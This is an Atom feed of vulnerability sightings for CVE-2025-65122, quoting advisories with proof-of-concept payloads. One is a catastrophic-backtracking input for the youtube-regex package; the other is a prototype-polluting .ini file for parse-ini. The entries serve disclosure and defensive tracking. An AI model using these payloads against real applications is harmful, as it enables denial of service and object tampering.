<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://vulnerability.circl.lu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-05-10T09:45:29.506535+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@circl.lu</email>
  </author>
  <link href="https://vulnerability.circl.lu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the 10 most recent sightings.</subtitle>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/f51c6e0c-c3cf-422a-9b0b-127a547f185a/export</id>
    <title>f51c6e0c-c3cf-422a-9b0b-127a547f185a</title>
    <updated>2026-05-10T09:45:30.007919+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "f51c6e0c-c3cf-422a-9b0b-127a547f185a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c", "content": "Product: https://github.com/regexhq/youtube-regex\nVersion: v1.0.5\nVulnerability type: Regex Denial of Service\nCVE ID: CVE-2025-65122\n\nDescription: \nThe regex on line 11. in index.js contains a Regex denial\nof service when large input is provided. It takes longer\namount of time to process larger strings because regex will\ntry to backtrack each time it encounters watch?-.\n\nPayload used:\n\nvar youtubeRegex = require('youtube-regex');\nconst startTime = performance.now();\nlet payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\\t'; // contains youtube url address \n//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');\nyoutubeRegex().test(payload);\nconst endTime = performance.now();\nconsole.log(`Time spent: ${endTime - startTime} milliseconds`);", "creation_timestamp": "2026-05-06T19:39:33.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/f51c6e0c-c3cf-422a-9b0b-127a547f185a/export"/>
    <published>2026-05-06T19:39:33+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/8cff9b3e-fff3-4268-afc3-b66f3715107c/export</id>
    <title>8cff9b3e-fff3-4268-afc3-b66f3715107c</title>
    <updated>2026-05-10T09:45:30.007726+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "8cff9b3e-fff3-4268-afc3-b66f3715107c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-65122\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype  pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n&gt;\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/8cff9b3e-fff3-4268-afc3-b66f3715107c/export"/>
    <published>2026-05-06T19:46:52+00:00</published>
  </entry>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/2049ee5c-6aef-4b67-9903-6b6431e37df2/export</id>
    <title>2049ee5c-6aef-4b67-9903-6b6431e37df2</title>
    <updated>2026-05-10T09:45:30.002477+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>http://vulnerability.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "2049ee5c-6aef-4b67-9903-6b6431e37df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mlbpa66hni2z", "content": "\ud83d\udfe0 CVE-2025-65122 - High (7.5)\n\nRegex Denial of Service in youtube-regex npm package through version 1.0.5.\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2025-65122/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-07T17:06:16.113213Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/2049ee5c-6aef-4b67-9903-6b6431e37df2/export"/>
    <published>2026-05-07T17:06:16.113213+00:00</published>
  </entry>
</feed>
